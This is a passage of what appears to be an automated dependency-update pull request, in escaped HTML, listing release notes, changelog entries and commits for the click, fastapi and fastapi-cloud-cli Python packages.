href=\"https://redirect.github.com/pallets/click/issues/3371\"\u003e#3371\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParamType\u003c/code\u003e is now a generic abstract base class,\nparameterized by its converted value type.\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.convert\u003c/code\u003e return types are narrowed on all\nconcrete types (\u003ccode\u003estr\u003c/code\u003e for :class:\u003ccode\u003eSTRING\u003c/code\u003e, \u003ccode\u003eint\u003c/code\u003e for\n:class:\u003ccode\u003eINT\u003c/code\u003e, etc.).\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.to_info_dict\u003c/code\u003e returns specific\n:class:\u003ccode\u003e~typing.TypedDict\u003c/code\u003e subclasses instead of\n\u003ccode\u003edict[str, Any]\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e:class:\u003ccode\u003eCompositeParamType\u003c/code\u003e and the number-range base are now\ngeneric with abstract methods.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRefactor \u003ccode\u003econvert_type\u003c/code\u003e to extract type inference into a private\n\u003ccode\u003e_guess_type\u003c/code\u003e helper, and add :func:\u003ccode\u003etyping.overload\u003c/code\u003e signatures.\n\u003ca href=\"https://redirect.github.com/pallets/click/issues/3372\"\u003e#3372\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eParameter\u003c/code\u003e typing improvements. \u003ca href=\"https://redirect.github.com/pallets/click/issues/2805\"\u003e#2805\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParameter\u003c/code\u003e is now an abstract base class, making explicit\nthat it cannot be instantiated directly.\u003c/li\u003e\n\u003cli\u003e:attr:\u003ccode\u003eParameter.name\u003c/code\u003e is now \u003ccode\u003estr\u003c/code\u003e instead of \u003ccode\u003estr | None\u003c/code\u003e.\nWhen \u003ccode\u003eexpose_value=False\u003c/code\u003e, the name is set to \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e instead\nof \u003ccode\u003eNone\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ectx\u003c/code\u003e parameter of :meth:\u003ccode\u003eParameter.get_error_hint\u003c/code\u003e is now\ntyped as \u003ccode\u003eContext | None\u003c/code\u003e, matching the runtime behavior.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSplit string values from \u003ccode\u003edefault_map\u003c/code\u003e for parameters with \u003ccode\u003enargs \u0026gt; 1\u003c/code\u003e\nor :class:\u003ccode\u003eTuple\u003c/code\u003e type, matching environment variable behavior.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/click/blob/main/CHANGES.rst\"\u003eclick's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 8.4.1\u003c/h2\u003e\n\u003cp\u003eReleased 2026-05-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eget_parameter_source()\u003c/code\u003e is available during eager callbacks and type\nconversion again. :issue:\u003ccode\u003e3458\u003c/code\u003e :issue:\u003ccode\u003e3484\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eZsh completion scripts parse correctly on Windows. :issue:\u003ccode\u003e3277\u003c/code\u003e :pr:\u003ccode\u003e3466\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eShell completion of \u003ccode\u003eChoice\u003c/code\u003e \u003ccode\u003eEnum\u003c/code\u003e values produces a valid completion\nresult. :issue:\u003ccode\u003e3015\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix empty byte-string handling in echo. :issue:\u003ccode\u003e3487\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix closed file error with \u003ccode\u003eecho_via_pager\u003c/code\u003e. :issue:\u003ccode\u003e3449\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 8.4.0\u003c/h2\u003e\n\u003cp\u003eReleased 2026-05-17\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e:class:\u003ccode\u003eParamType\u003c/code\u003e typing improvements. :pr:\u003ccode\u003e3371\u003c/code\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParamType\u003c/code\u003e is now a generic abstract base class,\nparameterized by its converted value type.\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.convert\u003c/code\u003e return types are narrowed on all\nconcrete types (\u003ccode\u003estr\u003c/code\u003e for :class:\u003ccode\u003eSTRING\u003c/code\u003e, \u003ccode\u003eint\u003c/code\u003e for\n:class:\u003ccode\u003eINT\u003c/code\u003e, etc.).\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.to_info_dict\u003c/code\u003e returns specific\n:class:\u003ccode\u003e~typing.TypedDict\u003c/code\u003e subclasses instead of\n\u003ccode\u003edict[str, Any]\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e:class:\u003ccode\u003eCompositeParamType\u003c/code\u003e and the number-range base are now\ngeneric with abstract methods.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRefactor \u003ccode\u003econvert_type\u003c/code\u003e to extract type inference into a private\n\u003ccode\u003e_guess_type\u003c/code\u003e helper, and add :func:\u003ccode\u003etyping.overload\u003c/code\u003e signatures.\n:pr:\u003ccode\u003e3372\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e:class:\u003ccode\u003eParameter\u003c/code\u003e typing improvements. :pr:\u003ccode\u003e2805\u003c/code\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParameter\u003c/code\u003e is now an abstract base class, making explicit\nthat it cannot be instantiated directly.\u003c/li\u003e\n\u003cli\u003e:attr:\u003ccode\u003eParameter.name\u003c/code\u003e is now \u003ccode\u003estr\u003c/code\u003e instead of \u003ccode\u003estr | None\u003c/code\u003e.\nWhen \u003ccode\u003eexpose_value=False\u003c/code\u003e, the name is set to \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e instead\nof \u003ccode\u003eNone\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ectx\u003c/code\u003e parameter of :meth:\u003ccode\u003eParameter.get_error_hint\u003c/code\u003e is now\ntyped as \u003ccode\u003eContext | None\u003c/code\u003e, matching the runtime behavior.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSplit string values from \u003ccode\u003edefault_map\u003c/code\u003e for parameters with \u003ccode\u003enargs \u0026gt; 1\u003c/code\u003e\nor :class:\u003ccode\u003eTuple\u003c/code\u003e type, matching environment variable behavior.\n:issue:\u003ccode\u003e2745\u003c/code\u003e :pr:\u003ccode\u003e3364\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAuto-detect \u003ccode\u003etype=UNPROCESSED\u003c/code\u003e for \u003ccode\u003eflag_value\u003c/code\u003e of non-basic types\n(not \u003ccode\u003estr\u003c/code\u003e, \u003ccode\u003eint\u003c/code\u003e, \u003ccode\u003efloat\u003c/code\u003e, or \u003ccode\u003ebool\u003c/code\u003e), so programmer-provided\nPython objects like classes and enum members are passed through unchanged\ninstead of being stringified. Previously \u003ccode\u003etype=click.UNPROCESSED\u003c/code\u003e had\nto be set explicitly. :issue:\u003ccode\u003e2012\u003c/code\u003e :pr:\u003ccode\u003e3363\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/6eeb50e948ea136db145280f6f5dd52eca3fa7e5\"\u003e\u003ccode\u003e6eeb50e\u003c/code\u003e\u003c/a\u003e release version 8.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/67921d5b71584112eebcbf89596b5f0e6d14c49f\"\u003e\u003ccode\u003e67921d5\u003c/code\u003e\u003c/a\u003e change log and doc fixes (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3495\"\u003e#3495\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/9c41f46a4015700489ad009266edf1f3893d01d1\"\u003e\u003ccode\u003e9c41f46\u003c/code\u003e\u003c/a\u003e Fix changelog and version admonitions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/6cb34774f20598aa288332f8da02c5aee85448a6\"\u003e\u003ccode\u003e6cb3477\u003c/code\u003e\u003c/a\u003e fix skip condition\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/5ee8e3123d8ddece6c47eff9a7a7d4ca478c4f37\"\u003e\u003ccode\u003e5ee8e31\u003c/code\u003e\u003c/a\u003e fix I/O operation on closed file error with CliRunner and echo_via_pager (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3482\"\u003e#3482\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/becbde5cf416441627f779e8dd34e57738ee1c1f\"\u003e\u003ccode\u003ebecbde5\u003c/code\u003e\u003c/a\u003e pager doesn't close std streams\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/a5f5aa6d4012d256ccca24638f2642fc371e9f77\"\u003e\u003ccode\u003ea5f5aa6\u003c/code\u003e\u003c/a\u003e Handle empty bytes in echo (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3493\"\u003e#3493\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/4d3db84b251518e97299a38a5ca4bab3d01873a2\"\u003e\u003ccode\u003e4d3db84\u003c/code\u003e\u003c/a\u003e handle empty bytes in echo\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/d42f15b71757de791a5781fb179fd972da9169f5\"\u003e\u003ccode\u003ed42f15b\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003eget_parameter_source()\u003c/code\u003e during type conversion and eager callbacks (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3484\"\u003e#3484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/0baa8db07736fc7ad3d3eed97d4c73b0059c63e1\"\u003e\u003ccode\u003e0baa8db\u003c/code\u003e\u003c/a\u003e Document ctx.params bypass with test and doc\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/click/compare/8.3.3...8.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fastapi` from 0.136.1 to 0.136.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastapi/fastapi/releases\"\u003efastapi's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.136.3\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (the default). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15589\"\u003e#15589\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.136.2\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Validate Server Sent Event fields to avoid applications from sending broken data. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15588\"\u003e#15588\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15464\"\u003e#15464\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update and simplify docs about help and management. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15583\"\u003e#15583\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add docs references to central contributing docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15580\"\u003e#15580\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update security policy. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15577\"\u003e#15577\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🍱 Update sponsors: TalorData image. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15562\"\u003e#15562\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update docs, simplify usage of admonitions, only default ones. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15553\"\u003e#15553\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Fix image URLs in \u003ccode\u003eindex.md\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15534\"\u003e#15534\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e✏️ Fix Azkaban spelling typo in \u003ccode\u003evirtual-environments.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15463\"\u003e#15463\u003c/a\u003e by \u003ca href=\"https://github.com/isaacbernat\"\u003e\u003ccode\u003e@​isaacbernat\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Improve layout and styling. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15462\"\u003e#15462\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Refactor opinions section with interactive tabs and new logos. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15458\"\u003e#15458\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add FastAPI Conf '26 announcement to docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15457\"\u003e#15457\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eTranslations\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🌐 Improve translation consistency in \u003ccode\u003e‎docs/pt/docs/advanced/generate-clients.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15456\"\u003e#15456\u003c/a\u003e by \u003ca href=\"https://github.com/Will-thom\"\u003e\u003ccode\u003e@​Will-thom\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ja (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15530\"\u003e#15530\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for uk (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15529\"\u003e#15529\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for pt (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15528\"\u003e#15528\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for de (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15527\"\u003e#15527\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for tr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15526\"\u003e#15526\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ko (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15525\"\u003e#15525\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh-hant (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15524\"\u003e#15524\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for fr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15522\"\u003e#15522\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for es (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15523\"\u003e#15523\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15520\"\u003e#15520\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ru (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15521\"\u003e#15521\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Fix typos in Spanish LLM-prompt. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15472\"\u003e#15472\u003c/a\u003e by \u003ca href=\"https://github.com/crr004\"\u003e\u003ccode\u003e@​crr004\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e✅ Update tests, don't double dispose the engine. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15587\"\u003e#15587\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⚡️ Speed up test suite via caching and fixture scopes to make it ~24% faster. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/13583\"\u003e#13583\u003c/a\u003e by \u003ca href=\"https://github.com/dikos1337\"\u003e\u003ccode\u003e@​dikos1337\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔥 Remove config files now in central GitHub repo. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15585\"\u003e#15585\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump urllib3 from 2.6.3 to 2.7.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15502\"\u003e#15502\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump idna from 3.11 to 3.15. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15565\"\u003e#15565\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump cloudflare/wrangler-action from 3.15.0 to 4.0.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15571\"\u003e#15571\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔧 Migrate docs from MkDocs to Zensical. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15563\"\u003e#15563\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔒️ Only allow team members to modify dependencies. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15548\"\u003e#15548\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/82064857539e6286522c347b4b11331b48dd2378\"\u003e\u003ccode\u003e8206485\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c910e0139f983d0e04e2d1d235cd71803afeae34\"\u003e\u003ccode\u003ec910e01\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/063b5bf582d31fb155cc6bc6f88cf512329d0fd5\"\u003e\u003ccode\u003e063b5bf\u003c/code\u003e\u003c/a\u003e ♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (th...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/22b02e26f9e8c7e32bd8266e2b0ebe8bb3a0db2b\"\u003e\u003ccode\u003e22b02e2\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3b252a2a22ba27a8ab83d6bde7d9cddbc5bf738e\"\u003e\u003ccode\u003e3b252a2\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c7fb7851b3389f24c51701d705458989be53ccbb\"\u003e\u003ccode\u003ec7fb785\u003c/code\u003e\u003c/a\u003e ♻️ Validate Server Sent Event fields to avoid applications from sending broke...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/cb83b83dcf78eab4ea17d504db5abcda705fbdc4\"\u003e\u003ccode\u003ecb83b83\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/00f805cec94c0bf48c1f9a563535a3ab2e6f90ab\"\u003e\u003ccode\u003e00f805c\u003c/code\u003e\u003c/a\u003e ✅ Update tests, don't double dispose the engine (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15587\"\u003e#15587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3675137523dc167981aa3a3c44599b4f3079ccd8\"\u003e\u003ccode\u003e3675137\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/7b57e42986bb4d40c9eb6580537d13fb8e76097e\"\u003e\u003ccode\u003e7b57e42\u003c/code\u003e\u003c/a\u003e 📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15464\"\u003e#15464\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastapi/fastapi/compare/0.136.1...0.136.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fastapi-cloud-cli` from 0.17.1 to 0.18.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/releases\"\u003efastapi-cloud-cli's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.18.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🚸 Show Top-3 files larger than threshold on \u003ccode\u003edeploy\u003c/code\u003e command. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/190\"\u003e#190\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e✨ Show if there's a new fastapi-cloud-cli version available. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/201\"\u003e#201\u003c/a\u003e by \u003ca href=\"https://github.com/patrick91\"\u003e\u003ccode\u003e@​patrick91\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Rename \u003ccode\u003eapp_slug\u003c/code\u003e parameter of \u003ccode\u003e_get_app\u003c/code\u003e to \u003ccode\u003eapp_id\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/192\"\u003e#192\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e♻️ Improve message around application directory. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/191\"\u003e#191\u003c/a\u003e by \u003ca href=\"https://github.com/patrick91\"\u003e\u003ccode\u003e@​patrick91\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🔒️ Only allow team members to modify dependencies. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/197\"\u003e#197\u003c/a\u003e by \u003ca 